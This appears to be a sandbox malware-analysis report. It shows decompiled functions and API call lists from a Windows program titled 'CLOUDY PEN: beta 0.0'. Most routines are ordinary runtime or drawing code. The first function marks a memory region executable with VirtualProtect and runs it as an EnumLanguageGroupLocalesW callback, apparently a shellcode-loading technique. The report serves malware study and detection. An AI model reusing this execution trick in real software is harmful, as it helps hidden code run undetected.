                                              				E002FC320(_a4, 0x3059b0, 0x3059c4);
                                              				 *0x3059c0 =  *0x3059b0;
                                              				VirtualProtect(0x304b90, 0x28c, 0x40,  &_v8);
                                              				__imp__EnumLanguageGroupLocalesW(0x304b90, 2, 0, 0);
                                              				CreateWindowExW(0, _v76.lpszClassName, L"CLOUDY PEN: beta 0.0", 0x10cf0000, 0x64, 0x64, 0x15e, 0xfa, 0, 0, _a4, 0);
                                              				while(GetMessageW( &_v36, 0, 0, 0) != 0) {
                                              					TranslateMessage( &_v36);
                                              					DispatchMessageW( &_v36);
                                              				}
                                              				return _v36.wParam;
                                              			}






                                              0x002fcc66
                                              0x002fcc6f
                                              0x002fcc72
                                              0x002fcc75
                                              0x002fcc78
                                              0x002fcc7b
                                              0x002fcc7e
                                              0x002fcc81
                                              0x002fcc84
                                              0x002fcc87
                                              0x002fcc8a
                                              0x002fcc94
                                              0x002fcc9f
                                              0x002fcca2
                                              0x002fccb6
                                              0x002fccbd
                                              0x002fcccd
                                              0x002fccd7
                                              0x002fccec
                                              0x002fccfd
                                              0x002fcd2b
                                              0x002fcd31
                                              0x002fcd49
                                              0x002fcd53
                                              0x002fcd53
                                              0x002fcd61

                                              APIs
                                              • GetSysColorBrush.USER32(0000000F), ref: 002FCC99
                                              • LoadCursorW.USER32(00000000,00007F00), ref: 002FCCB0
                                              • RegisterClassW.USER32 ref: 002FCCBD
                                              • VirtualProtect.KERNEL32(00304B90,0000028C,00000040,?), ref: 002FCCEC
                                              • EnumLanguageGroupLocalesW.KERNEL32(00304B90,00000002,00000000,00000000), ref: 002FCCFD
                                              • CreateWindowExW.USER32 ref: 002FCD2B
                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 002FCD3B
                                              • TranslateMessage.USER32(?), ref: 002FCD49
                                              • DispatchMessageW.USER32 ref: 002FCD53
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.743554969.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000002.00000002.743539901.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743627285.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743660121.0000000000304000.00000008.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743687948.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.744254245.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: Message$BrushClassColorCreateCursorDispatchEnumGroupLanguageLoadLocalesProtectRegisterTranslateVirtualWindow
                                              • String ID: CLOUDY PEN: beta 0.0
                                              • API String ID: 1824785041-196906049
                                              • Opcode ID: 38a1beb99710dcac6768da31e043867376f209c08b1f0fb9f33a4d3c4c138b3c
                                              • Instruction ID: 1bc684bc4ca9132823ae970a1d0781f421ec50fc9c7b4ef2174188eefc2bb246
                                              • Opcode Fuzzy Hash: 38a1beb99710dcac6768da31e043867376f209c08b1f0fb9f33a4d3c4c138b3c
                                              • Instruction Fuzzy Hash: 6131ECB0A41308AFEB51DFA4ED5AFEE7BB4AB08B50F104129F609BA2D0D7B05900CB54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 69%
                                              			E002F71BF(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
                                              				signed int _v8;
                                              				int _v12;
                                              				void* _v24;
                                              				signed int _t49;
                                              				signed int _t54;
                                              				int _t58;
                                              				signed int _t60;
                                              				short* _t62;
                                              				signed int _t66;
                                              				short* _t70;
                                              				int _t71;
                                              				int _t78;
                                              				short* _t81;
                                              				signed int _t87;
                                              				signed int _t90;
                                              				void* _t95;
                                              				void* _t96;
                                              				int _t98;
                                              				short* _t101;
                                              				int _t103;
                                              				signed int _t106;
                                              				short* _t107;
                                              				void* _t110;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_t49 =  *0x304018; // 0xbb40e64e
                                              				_v8 = _t49 ^ _t106;
                                              				_push(__esi);
                                              				_t103 = _a20;
                                              				if(_t103 > 0) {
                                              					_t78 = E002F795F(_a16, _t103);
                                              					_t110 = _t78 - _t103;
                                              					_t4 = _t78 + 1; // 0x1
                                              					_t103 = _t4;
                                              					if(_t110 >= 0) {
                                              						_t103 = _t78;
                                              					}
                                              				}
                                              				_t98 = _a32;
                                              				if(_t98 == 0) {
                                              					_t98 =  *( *_a4 + 8);
                                              					_a32 = _t98;
                                              				}
                                              				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
                                              				_v12 = _t54;
                                              				if(_t54 == 0) {
                                              					L38:
                                              					return E002F19D1(_v8 ^ _t106);
                                              				} else {
                                              					_t95 = _t54 + _t54;
                                              					_t85 = _t95 + 8;
                                              					asm("sbb eax, eax");
                                              					if((_t95 + 0x00000008 & _t54) == 0) {
                                              						_t81 = 0;
                                              						__eflags = 0;
                                              						L14:
                                              						if(_t81 == 0) {
                                              							L36:
                                              							_t105 = 0;
                                              							L37:
                                              							E002F5CC8(_t81);
                                              							goto L38;
                                              						}
                                              						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
                                              						_t121 = _t58;
                                              						if(_t58 == 0) {
                                              							goto L36;
                                              						}
                                              						_t100 = _v12;
                                              						_t60 = E002F527C(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
                                              						_t105 = _t60;
                                              						if(_t105 == 0) {
                                              							goto L36;
                                              						}
                                              						if((_a12 & 0x00000400) == 0) {
                                              							_t96 = _t105 + _t105;
                                              							_t87 = _t96 + 8;
                                              							__eflags = _t96 - _t87;
                                              							asm("sbb eax, eax");
                                              							__eflags = _t87 & _t60;
                                              							if((_t87 & _t60) == 0) {
                                              								_t101 = 0;
                                              								__eflags = 0;
                                              								L30:
                                              								__eflags = _t101;
                                              								if(__eflags == 0) {
                                              									L35:
                                              									E002F5CC8(_t101);
                                              									goto L36;
                                              								}
                                              								_t62 = E002F527C(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
                                              								__eflags = _t62;
                                              								if(_t62 == 0) {
                                              									goto L35;
                                              								}
                                              								_push(0);
                                              								_push(0);
                                              								__eflags = _a28;
                                              								if(_a28 != 0) {
                                              									_push(_a28);
                                              									_push(_a24);
                                              								} else {
                                              									_push(0);
                                              									_push(0);
                                              								}
                                              								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
                                              								__eflags = _t105;
                                              								if(_t105 != 0) {
                                              									E002F5CC8(_t101);
                                              									goto L37;
                                              								} else {
                                              									goto L35;
                                              								}
                                              							}
                                              							_t90 = _t96 + 8;
                                              							__eflags = _t96 - _t90;
                                              							asm("sbb eax, eax");
                                              							_t66 = _t60 & _t90;
                                              							_t87 = _t96 + 8;
                                              							__eflags = _t66 - 0x400;
                                              							if(_t66 > 0x400) {
                                              								__eflags = _t96 - _t87;
                                              								asm("sbb eax, eax");
                                              								_t101 = E002F3696(_t87, _t66 & _t87);
                                              								_pop(_t87);
                                              								__eflags = _t101;
                                              								if(_t101 == 0) {
                                              									goto L35;
                                              								}
                                              								 *_t101 = 0xdddd;
                                              								L28:
                                              								_t101 =  &(_t101[4]);
                                              								goto L30;
                                              							}
                                              							__eflags = _t96 - _t87;
                                              							asm("sbb eax, eax");
                                              							E002FA3A0();
                                              							_t101 = _t107;
                                              							__eflags = _t101;
                                              							if(_t101 == 0) {
                                              								goto L35;
                                              							}
                                              							 *_t101 = 0xcccc;
                                              							goto L28;
                                              						}
                                              						_t70 = _a28;
                                              						if(_t70 == 0) {
                                              							goto L37;
                                              						}
                                              						_t125 = _t105 - _t70;
                                              						if(_t105 > _t70) {
                                              							goto L36;
                                              						}
                                              						_t71 = E002F527C(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
                                              						_t105 = _t71;
                                              						if(_t71 != 0) {
                                              							goto L37;
                                              						}
                                              						goto L36;
                                              					}
                                              					asm("sbb eax, eax");
                                              					_t72 = _t54 & _t95 + 0x00000008;
                                              					_t85 = _t95 + 8;
                                              					if((_t54 & _t95 + 0x00000008) > 0x400) {
                                              						__eflags = _t95 - _t85;
                                              						asm("sbb eax, eax");
                                              						_t81 = E002F3696(_t85, _t72 & _t85);
                                              						_pop(_t85);
                                              						__eflags = _t81;
                                              						if(__eflags == 0) {
                                              							goto L36;
                                              						}
                                              						 *_t81 = 0xdddd;
                                              						L12:
                                              						_t81 =  &(_t81[4]);
                                              						goto L14;
                                              					}
                                              					asm("sbb eax, eax");
                                              					E002FA3A0();
                                              					_t81 = _t107;
                                              					if(_t81 == 0) {
                                              						goto L36;
                                              					}
                                              					 *_t81 = 0xcccc;
                                              					goto L12;
                                              				}
                                              			}


























                                              0x002f71c4
                                              0x002f71c5
                                              0x002f71c6
                                              0x002f71cd
                                              0x002f71d1
                                              0x002f71d2
                                              0x002f71d8
                                              0x002f71de
                                              0x002f71e4
                                              0x002f71e7
                                              0x002f71e7
                                              0x002f71ea
                                              0x002f71ec
                                              0x002f71ec
                                              0x002f71ea
                                              0x002f71ee
                                              0x002f71f3
                                              0x002f71fa
                                              0x002f71fd
                                              0x002f71fd
                                              0x002f7219
                                              0x002f721f
                                              0x002f7224
                                              0x002f73b7
                                              0x002f73ca
                                              0x002f722a
                                              0x002f722a
                                              0x002f722d
                                              0x002f7232
                                              0x002f7236
                                              0x002f728a
                                              0x002f728a
                                              0x002f728c
                                              0x002f728e
                                              0x002f73ac
                                              0x002f73ac
                                              0x002f73ae
                                              0x002f73af
                                              0x00000000
                                              0x002f73b5
                                              0x002f729f
                                              0x002f72a5
                                              0x002f72a7
                                              0x00000000
                                              0x00000000
                                              0x002f72ad
                                              0x002f72bf
                                              0x002f72c4
                                              0x002f72c8
                                              0x00000000
                                              0x00000000
                                              0x002f72d5
                                              0x002f730f
                                              0x002f7312
                                              0x002f7315
                                              0x002f7317
                                              0x002f7319
                                              0x002f731b
                                              0x002f7367
                                              0x002f7367
                                              0x002f7369
                                              0x002f7369
                                              0x002f736b
                                              0x002f73a5
                                              0x002f73a6
                                              0x00000000
                                              0x002f73ab
                                              0x002f737f
                                              0x002f7384
                                              0x002f7386
                                              0x00000000
                                              0x00000000
                                              0x002f738a
                                              0x002f738b
                                              0x002f738c
                                              0x002f738f
                                              0x002f73cb
                                              0x002f73ce
                                              0x002f7391
                                              0x002f7391
                                              0x002f7392
                                              0x002f7392
                                              0x002f739f
                                              0x002f73a1
                                              0x002f73a3
                                              0x002f73d4
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002f73a3
                                              0x002f731d
                                              0x002f7320
                                              0x002f7322
                                              0x002f7324
                                              0x002f7326
                                              0x002f7329
                                              0x002f732e
                                              0x002f7349
                                              0x002f734b
                                              0x002f7355
                                              0x002f7357
                                              0x002f7358
                                              0x002f735a
                                              0x00000000
                                              0x00000000
                                              0x002f735c
                                              0x002f7362
                                              0x002f7362
                                              0x00000000
                                              0x002f7362
                                              0x002f7330
                                              0x002f7332
                                              0x002f7336
                                              0x002f733b
                                              0x002f733d
                                              0x002f733f
                                              0x00000000
                                              0x00000000
                                              0x002f7341
                                              0x00000000
                                              0x002f7341
                                              0x002f72d7
                                              0x002f72dc
                                              0x00000000
                                              0x00000000
                                              0x002f72e2
                                              0x002f72e4
                                              0x00000000
                                              0x00000000
                                              0x002f72fb
                                              0x002f7300
                                              0x002f7304
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002f730a
                                              0x002f723d
                                              0x002f723f
                                              0x002f7241
                                              0x002f7249
                                              0x002f7268
                                              0x002f726a
                                              0x002f7274
                                              0x002f7276
                                              0x002f7277
                                              0x002f7279
                                              0x00000000
                                              0x00000000
                                              0x002f727f
                                              0x002f7285
                                              0x002f7285
                                              0x00000000
                                              0x002f7285
                                              0x002f724d
                                              0x002f7251
                                              0x002f7256
                                              0x002f725a
                                              0x00000000
                                              0x00000000
                                              0x002f7260
                                              0x00000000
                                              0x002f7260

                                              APIs
                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,002F7410,?,?,00000000), ref: 002F7219
                                              • __alloca_probe_16.LIBCMT ref: 002F7251
                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,002F7410,?,?,00000000,?,?,?), ref: 002F729F
                                              • __alloca_probe_16.LIBCMT ref: 002F7336
                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 002F7399
                                              • __freea.LIBCMT ref: 002F73A6
                                                • Part of subcall function 002F3696: HeapAlloc.KERNEL32(00000000,?,00000004,?,002F381C,?,00000000,?,002F60CD,?,00000004,00000000,?,?,?,002F3361), ref: 002F36C8
                                              • __freea.LIBCMT ref: 002F73AF
                                              • __freea.LIBCMT ref: 002F73D4
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.743554969.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000002.00000002.743539901.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743627285.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743660121.0000000000304000.00000008.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743687948.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.744254245.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
                                              • String ID:
                                              • API String ID: 2597970681-0
                                              • Opcode ID: 79214484eb9c871ee3b9462c07cfabde08cd11e058c3817099d9c09b9cd44d3b
                                              • Instruction ID: 43bc0e9ba9128226248c9f989fd150a18c19126853d7f0b8dde60b7c5098216e
                                              • Opcode Fuzzy Hash: 79214484eb9c871ee3b9462c07cfabde08cd11e058c3817099d9c09b9cd44d3b
                                              • Instruction Fuzzy Hash: C851007262421FBBEB258E64CC42EBFB7AAEB44790B150279FE04D6150EB70DC609B50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002FC0F0(int _a4, struct HWND__* _a8) {
                                              				long* _v8;
                                              				struct HDC__* _v12;
                                              				int _v16;
                                              				int _v20;
                                              				struct HBRUSH__* _v24;
                                              				void* _v28;
                                              				int _t41;
                                              
                                              				_t41 = _a4;
                                              				_v8 =  *_t41;
                                              				while(_v8 != 0) {
                                              					_v12 = GetDC(_a8);
                                              					_v20 = _v8[2];
                                              					_v16 = _v8[3];
                                              					if(_v20 < 0 || _v16 < 0) {
                                              						_v24 = CreateSolidBrush(_v8[1]);
                                              						_v28 = SelectObject(_v12, _v24);
                                              						ExtFloodFill(_v12,  *(_v8[4] + 8),  *(_v8[4] + 0xc),  *_v8, 1);
                                              						SelectObject(_v12, _v28);
                                              						return DeleteObject(_v12);
                                              					}
                                              					SetPixel(_v12, _v20, _v16, _v8[1]);
                                              					_v8 = _v8[4];
                                              					_t41 = ReleaseDC(_a8, _v12);
                                              				}
                                              				return _t41;
                                              			}










                                              0x002fc0f6
                                              0x002fc0fb
                                              0x002fc0fe
                                              0x002fc112
                                              0x002fc11b
                                              0x002fc124
                                              0x002fc12b
                                              0x002fc15b
                                              0x002fc16c
                                              0x002fc18f
                                              0x002fc19d
                                              0x00000000
                                              0x002fc1a7
                                              0x002fc146
                                              0x002fc1b5
                                              0x002fc1c0
                                              0x002fc1c0
                                              0x002fc1ce

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.743554969.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000002.00000002.743539901.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743627285.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743660121.0000000000304000.00000008.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743687948.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.744254245.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: Object$Select$BrushCreateDeleteFillFloodPixelReleaseSolid
                                              • String ID:
                                              • API String ID: 2019556567-0
                                              • Opcode ID: 9f0208953a36b982dc7ec73fddde9ff7b38050f52dc80a3b96da8e62fcaeee75
                                              • Instruction ID: 4c913f30251323b740b4c7693da2ffb3dedb81674b65a05090a9138130059aa1
                                              • Opcode Fuzzy Hash: 9f0208953a36b982dc7ec73fddde9ff7b38050f52dc80a3b96da8e62fcaeee75
                                              • Instruction Fuzzy Hash: 01318479A10208EFCB04DF98D988DAEF7B5BF88350F208598E909A7361C771AE51DF50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002FC1E0(int _a4, struct HWND__* _a8) {
                                              				long* _v8;
                                              				struct HDC__* _v12;
                                              				int _v16;
                                              				int _v20;
                                              				struct HBRUSH__* _v24;
                                              				void* _v28;
                                              				int _t40;
                                              
                                              				_t40 = _a4;
                                              				_v8 =  *_t40;
                                              				while(_v8 != 0) {
                                              					_v12 = GetDC(_a8);
                                              					_v20 = _v8[2];
                                              					_v16 = _v8[3];
                                              					if(_v20 < 0 || _v16 < 0) {
                                              						_v24 = CreateSolidBrush( *_v8);
                                              						_v28 = SelectObject(_v12, _v24);
                                              						ExtFloodFill(_v12,  *(_v8[4] + 8),  *(_v8[4] + 0xc), _v8[1], 1);
                                              						SelectObject(_v12, _v28);
                                              						return DeleteObject(_v24);
                                              					}
                                              					SetPixel(_v12, _v20, _v16,  *_v8);
                                              					_v8 = _v8[4];
                                              					_t40 = ReleaseDC(_a8, _v12);
                                              				}
                                              				return _t40;
                                              			}










                                              0x002fc1e6
                                              0x002fc1eb
                                              0x002fc1ee
                                              0x002fc202
                                              0x002fc20b
                                              0x002fc214
                                              0x002fc21b
                                              0x002fc249
                                              0x002fc25a
                                              0x002fc27e
                                              0x002fc28c
                                              0x00000000
                                              0x002fc296
                                              0x002fc235
                                              0x002fc2a4
                                              0x002fc2af
                                              0x002fc2af
                                              0x002fc2bd

                                              APIs
                                              • GetDC.USER32(?), ref: 002FC1FC
                                              • SetPixel.GDI32(?,00000000,00000000,00000000), ref: 002FC235
                                              • CreateSolidBrush.GDI32(?), ref: 002FC243
                                              • SelectObject.GDI32(?,?), ref: 002FC254
                                              • ExtFloodFill.GDI32(?,?,?,?,00000001), ref: 002FC27E
                                              • SelectObject.GDI32(?,?), ref: 002FC28C
                                              • DeleteObject.GDI32(?), ref: 002FC296
                                              • ReleaseDC.USER32 ref: 002FC2AF
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.743554969.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000002.00000002.743539901.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743627285.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743660121.0000000000304000.00000008.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743687948.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.744254245.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: Object$Select$BrushCreateDeleteFillFloodPixelReleaseSolid
                                              • String ID:
                                              • API String ID: 2019556567-0
                                              • Opcode ID: 208679d2345c7900cd0dec7b7493610eb2130dad6ae4fef99e56d4d1067b5ca0
                                              • Instruction ID: 9d87577a3609e387190e3697e5d7fd5c95a8d2ed99a56f85721d654b6051f932
                                              • Opcode Fuzzy Hash: 208679d2345c7900cd0dec7b7493610eb2130dad6ae4fef99e56d4d1067b5ca0
                                              • Instruction Fuzzy Hash: 65318279A10208EFCB08CFD4D9989AEB7B5FB88350F208599E905A7360C770AE41DF60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 73%
                                              			E002F7AAA(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
                                              				signed int _v8;
                                              				signed char _v15;
                                              				char _v16;
                                              				void _v24;
                                              				short _v28;
                                              				char _v31;
                                              				void _v32;
                                              				long _v36;
                                              				intOrPtr _v40;
                                              				void* _v44;
                                              				signed int _v48;
                                              				signed char* _v52;
                                              				long _v56;
                                              				int _v60;
                                              				signed int _t78;
                                              				signed int _t80;
                                              				int _t86;
                                              				void* _t94;
                                              				long _t97;
                                              				void _t105;
                                              				void* _t112;
                                              				signed int _t116;
                                              				signed int _t118;
                                              				signed char _t123;
                                              				signed char _t128;
                                              				intOrPtr _t129;
                                              				signed int _t131;
                                              				signed char* _t133;
                                              				intOrPtr* _t135;
                                              				signed int _t136;
                                              				void* _t137;
                                              
                                              				_t78 =  *0x304018; // 0xbb40e64e
                                              				_v8 = _t78 ^ _t136;
                                              				_t80 = _a8;
                                              				_t118 = _t80 >> 6;
                                              				_t116 = (_t80 & 0x0000003f) * 0x30;
                                              				_t133 = _a12;
                                              				_v52 = _t133;
                                              				_v48 = _t118;
                                              				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x3056f8 + _t118 * 4)) + _t116 + 0x18));
                                              				_v40 = _a16 + _t133;
                                              				_t86 = GetConsoleCP();
                                              				_t135 = _a4;
                                              				_v60 = _t86;
                                              				 *_t135 = 0;
                                              				 *((intOrPtr*)(_t135 + 4)) = 0;
                                              				 *((intOrPtr*)(_t135 + 8)) = 0;
                                              				while(_t133 < _v40) {
                                              					_v28 = 0;
                                              					_v31 =  *_t133;
                                              					_t129 =  *((intOrPtr*)(0x3056f8 + _v48 * 4));
                                              					_t123 =  *(_t129 + _t116 + 0x2d);
                                              					if((_t123 & 0x00000004) == 0) {
                                              						if(( *(E002F58B9(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
                                              							_push(1);
                                              							_push(_t133);
                                              							goto L8;
                                              						} else {
                                              							if(_t133 >= _v40) {
                                              								_t131 = _v48;
                                              								 *((char*)( *((intOrPtr*)(0x3056f8 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
                                              								 *( *((intOrPtr*)(0x3056f8 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x3056f8 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
                                              								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
                                              							} else {
                                              								_t112 = E002F6B15( &_v28, _t133, 2);
                                              								_t137 = _t137 + 0xc;
                                              								if(_t112 != 0xffffffff) {
                                              									_t133 =  &(_t133[1]);
                                              									goto L9;
                                              								}
                                              							}
                                              						}
                                              					} else {
                                              						_t128 = _t123 & 0x000000fb;
                                              						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
                                              						_push(2);
                                              						_v15 = _t128;
                                              						 *(_t129 + _t116 + 0x2d) = _t128;
                                              						_push( &_v16);
                                              						L8:
                                              						_push( &_v28);
                                              						_t94 = E002F6B15();
                                              						_t137 = _t137 + 0xc;
                                              						if(_t94 != 0xffffffff) {
                                              							L9:
                                              							_t133 =  &(_t133[1]);
                                              							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
                                              							_v56 = _t97;
                                              							if(_t97 != 0) {
                                              								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
                                              									L19:
                                              									 *_t135 = GetLastError();
                                              								} else {
                                              									 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 8)) - _v52 + _t133;
                                              									if(_v36 >= _v56) {
                                              										if(_v31 != 0xa) {
                                              											goto L16;
                                              										} else {
                                              											_t105 = 0xd;
                                              											_v32 = _t105;
                                              											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
                                              												goto L19;
                                              											} else {
                                              												if(_v36 >= 1) {
                                              													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
                                              													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
                                              													goto L16;
                                              												}
                                              											}
                                              										}
                                              									}
                                              								}
                                              							}
                                              						}
                                              					}
                                              					goto L20;
                                              					L16:
                                              				}
                                              				L20:
                                              				return E002F19D1(_v8 ^ _t136);
                                              			}


































                                              0x002f7ab2
                                              0x002f7ab9
                                              0x002f7abc
                                              0x002f7ac4
                                              0x002f7ac8
                                              0x002f7ad4
                                              0x002f7ad7
                                              0x002f7ada
                                              0x002f7ae1
                                              0x002f7ae9
                                              0x002f7aec
                                              0x002f7af2
                                              0x002f7af8
                                              0x002f7afd
                                              0x002f7aff
                                              0x002f7b02
                                              0x002f7b07
                                              0x002f7b11
                                              0x002f7b18
                                              0x002f7b1b
                                              0x002f7b22
                                              0x002f7b29
                                              0x002f7b55
                                              0x002f7b7b
                                              0x002f7b7d
                                              0x00000000
                                              0x002f7b57
                                              0x002f7b5a
                                              0x002f7c21
                                              0x002f7c2d
                                              0x002f7c38
                                              0x002f7c3d
                                              0x002f7b60
                                              0x002f7b67
                                              0x002f7b6c
                                              0x002f7b72
                                              0x002f7b78
                                              0x00000000
                                              0x002f7b78
                                              0x002f7b72
                                              0x002f7b5a
                                              0x002f7b2b
                                              0x002f7b2f
                                              0x002f7b32
                                              0x002f7b38
                                              0x002f7b3a
                                              0x002f7b3d
                                              0x002f7b41
                                              0x002f7b7e
                                              0x002f7b81
                                              0x002f7b82
                                              0x002f7b87
                                              0x002f7b8d
                                              0x002f7b93
                                              0x002f7ba2
                                              0x002f7ba8
                                              0x002f7bae
                                              0x002f7bb3
                                              0x002f7bcf
                                              0x002f7c42
                                              0x002f7c48
                                              0x002f7bd1
                                              0x002f7bd9
                                              0x002f7be2
                                              0x002f7be8
                                              0x00000000
                                              0x002f7bea
                                              0x002f7bec
                                              0x002f7bef
                                              0x002f7c08
                                              0x00000000
                                              0x002f7c0a
                                              0x002f7c0e
                                              0x002f7c10
                                              0x002f7c13
                                              0x00000000
                                              0x002f7c13
                                              0x002f7c0e
                                              0x002f7c08
                                              0x002f7be8
                                              0x002f7be2
                                              0x002f7bcf
                                              0x002f7bb3
                                              0x002f7b8d
                                              0x00000000
                                              0x002f7c16
                                              0x002f7c16
                                              0x002f7c4a
                                              0x002f7c5c

                                              APIs
                                              • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,002F821F,?,00000000,?,00000000,00000000), ref: 002F7AEC
                                              • __fassign.LIBCMT ref: 002F7B67
                                              • __fassign.LIBCMT ref: 002F7B82
                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 002F7BA8
                                              • WriteFile.KERNEL32(?,?,00000000,002F821F,00000000,?,?,?,?,?,?,?,?,?,002F821F,?), ref: 002F7BC7
                                              • WriteFile.KERNEL32(?,?,00000001,002F821F,00000000,?,?,?,?,?,?,?,?,?,002F821F,?), ref: 002F7C00
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.743554969.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000002.00000002.743539901.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743627285.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743660121.0000000000304000.00000008.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743687948.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.744254245.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                              • String ID:
                                              • API String ID: 1324828854-0
                                              • Opcode ID: 1467036a1137ba96bb8c4cbe082a4c5f6256bffaae9bb3e427a1e7ac5a1186b2
                                              • Instruction ID: 9889fc726157420b97cad4c1014da81693ccc0eaec0cab8c9ba46af1544bd160
                                              • Opcode Fuzzy Hash: 1467036a1137ba96bb8c4cbe082a4c5f6256bffaae9bb3e427a1e7ac5a1186b2
                                              • Instruction Fuzzy Hash: 1A51F3B091420D9FDB10CFA8D885AFEFBF8EF09340F14407AE651E7291E6709951CB60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002FCD70(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                              				int _v8;
                                              				struct HDC__* _v12;
                                              				struct tagRECT _v28;
                                              				struct tagPAINTSTRUCT _v92;
                                              				long _t36;
                                              
                                              				_v8 = _a8;
                                              				if(_v8 == 0xf) {
                                              					GetClientRect(_a4,  &_v28);
                                              					_v12 = BeginPaint(_a4,  &_v92);
                                              					_t36 =  *0x304a00; // 0xffffff
                                              					SetBkColor(_v12, _t36);
                                              					ExtTextOutW(_v12, 0, 0, 2,  &_v28, 0x305938, 0, 0);
                                              					EndPaint(_a4,  &_v92);
                                              				} else {
                                              					if(_v8 == 0x201) {
                                              						 *0x304a00 = E002FCA50(_a4);
                                              						InvalidateRect(_a4, 0, 1);
                                              					}
                                              				}
                                              				return DefWindowProcW(_a4, _a8, _a12, _a16);
                                              			}








                                              0x002fcd79
                                              0x002fcd80
                                              0x002fcdb3
                                              0x002fcdc7
                                              0x002fcdca
                                              0x002fcdd5
                                              0x002fcdf2
                                              0x002fce00
                                              0x002fcd82
                                              0x002fcd89
                                              0x002fcd96
                                              0x002fcda3
                                              0x002fcda3
